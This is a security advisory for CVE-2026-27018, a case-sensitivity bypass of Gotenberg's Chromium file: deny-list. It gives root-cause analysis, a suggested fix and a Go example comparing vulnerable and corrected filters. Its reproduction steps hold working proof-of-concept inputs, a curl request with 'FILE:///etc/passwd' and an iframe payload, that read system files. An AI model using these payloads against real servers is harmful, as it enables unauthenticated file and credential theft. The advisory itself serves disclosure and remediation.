
CVE

CVE-2026-27018

Gotenberg has Chromium deny-list bypass via case-insensitive URL scheme (bypass of GHSA-rh2x-ccvw-q7r3)

Impact

The fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.

The default --chromium-deny-list value is ^file:(?!//\/tmp/).*. This regex is anchored to lowercase file: at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like FILE:///etc/passwd or File:///etc/passwd bypasses the deny-list check but still gets resolved by Chromium as file:///etc/passwd.

The root cause is in pkg/gotenberg/filter.go — the FilterDeadline function compiles the deny-list regex with regexp2.MustCompile(denied.String(), 0), where 0 means no flags (case-sensitive). Since the regex pattern itself doesn't include a (?i) flag, matching is strictly case-sensitive.

This affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).

Steps to Reproduce

  1. Start Gotenberg with default settings:

     docker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg

  2. Read /etc/passwd via the URL endpoint using an uppercase scheme:

     curl -X POST 'http://localhost:3000/forms/chromium/convert/url' \
       --form 'url=FILE:///etc/passwd' -o output.pdf

  3. Open output.pdf — it contains the contents of /etc/passwd.

  4. Alternatively, create an index.html:

     <iframe src="FILE:///etc/passwd" width="100%" height="100%"></iframe>

     Then convert it:

     curl -X POST 'http://localhost:3000/forms/chromium/convert/html' \
       -F 'files=@index.html' -o output.pdf

  5. The resulting PDF contains /etc/passwd contents.

Mixed-case variants such as File:, fILE:, fiLE: and so on all work as well.

Root Cause

  • pkg/modules/chromium/chromium.go defines the default deny-list as ^file:(?!//\/tmp/).*
  • pkg/gotenberg/filter.go compiles this with regexp2.MustCompile(denied.String(), 0) — flag 0 means case-sensitive
  • pkg/modules/chromium/events.go uses FilterDeadline to check intercepted request URLs against the deny-list
  • Chromium normalizes URL schemes to lowercase, so FILE:///etc/passwd becomes file:///etc/passwd after the deny-list check has already passed

Suggested Fix

Change the default deny-list regex to use a case-insensitive flag:

(?i)^file:(?!//\/tmp/).*

Or apply case-insensitive matching in FilterDeadline when compiling the regex.
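The following Go program is an added example, not Gotenberg's code, that puts the pre-fix check, the (?i) variant suggested above, and a normalize-then-match variant side by side for the URLs named in this advisory. Two assumptions: Go's standard regexp package has no negative lookahead, so the `(?!//\/tmp/)` exception from the real default pattern is expressed here as a separate allow pattern with the same effect, and all function names (deniedVulnerable, deniedCaseInsensitive, normalizeScheme, deniedNormalized) are invented for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
)

// Added example (not Gotenberg's code). The project's real default pattern is
// ^file:(?!//\/tmp/).* compiled with regexp2; Go's regexp lacks lookahead, so
// "file: is denied unless the path is under /tmp/" is modelled as a deny
// pattern plus an allow pattern. The decision logic is otherwise the same.

// Case-sensitive patterns, mirroring the pre-fix behaviour (regexp2 flag 0).
var (
	denyCaseSensitive  = regexp.MustCompile(`^file:`)
	allowCaseSensitive = regexp.MustCompile(`^file:///tmp/`)
)

// Case-insensitive patterns, the (?i) variant the advisory suggests.
var (
	denyCaseInsensitive  = regexp.MustCompile(`(?i)^file:`)
	allowCaseInsensitive = regexp.MustCompile(`(?i)^file:///tmp/`)
)

// deniedVulnerable is the pre-fix check: the raw URL string is matched
// case-sensitively, so "FILE:" or "File:" never matches "^file:".
func deniedVulnerable(raw string) bool {
	return denyCaseSensitive.MatchString(raw) && !allowCaseSensitive.MatchString(raw)
}

// deniedCaseInsensitive applies (?i) to the whole pattern, including the
// /tmp path exception.
func deniedCaseInsensitive(raw string) bool {
	return denyCaseInsensitive.MatchString(raw) && !allowCaseInsensitive.MatchString(raw)
}

// normalizeScheme lowercases only the URL scheme, which is what Chromium does
// before navigation (RFC 3986 section 3.1). net/url already lowercases
// u.Scheme, and lowercasing does not change its length, so the remainder of
// the original string is spliced back untouched.
func normalizeScheme(raw string) string {
	u, err := url.Parse(raw)
	if err != nil || u.Scheme == "" {
		return raw
	}
	return u.Scheme + raw[len(u.Scheme):]
}

// deniedNormalized normalizes first, then runs the original case-sensitive
// check, so the filter sees the same URL Chromium will resolve while the
// /tmp path exception stays case-sensitive like the filesystem it names.
func deniedNormalized(raw string) bool {
	return deniedVulnerable(normalizeScheme(raw))
}

func main() {
	// Constructed sample URLs covering the cases described in the advisory.
	samples := []string{
		"file:///etc/passwd",
		"FILE:///etc/passwd",
		"File:///etc/passwd",
		"fiLE:///etc/passwd",
		"file:///tmp/index.html",
		"https://example.com/",
	}
	fmt.Printf("%-26s %-10s %-12s %-10s\n", "url", "vulnerable", "(?i)pattern", "normalized")
	for _, s := range samples {
		fmt.Printf("%-26s %-10t %-12t %-10t\n",
			s, deniedVulnerable(s), deniedCaseInsensitive(s), deniedNormalized(s))
	}
}
```

Running it shows the uppercase and mixed-case schemes slipping past the first column and being caught by the other two. The difference between the last two columns is scope: a global (?i) also makes the /tmp exception case-insensitive, whereas normalizing just the scheme keeps the path comparison exact, which matches how both Chromium (scheme) and a Linux filesystem (path) actually behave.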

Severity

This is effectively the same impact as CVE-2024-21527 — unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.


CVSS Score

CVSS Version: 4.0
Base Score: 8.8
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X


References

https://github.com/gotenberg/gotenberg/security/advisories/GHSA-jjwv-57xh-xr6r
https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rh2x-ccvw-q7r3
https://nvd.nist.gov/vuln/detail/CVE-2026-27018
https://github.com/gotenberg/gotenberg/commit/06b2b2e10c52b58135edbfe82e94d599eb0c5a11
https://github.com/gotenberg/gotenberg/commit/8625a4e899eb75e6fcf46d28394334c7fd79fff5
https://github.com/gotenberg/gotenberg
https://github.com/gotenberg/gotenberg/releases/tag/v8.29.0

Basic Information

Base CVSS: 7.5
EPSS Probability: 0.00033%
EPSS Percentile: 0.10215%
Introduced Version: 0
Fix Available: 8.29.0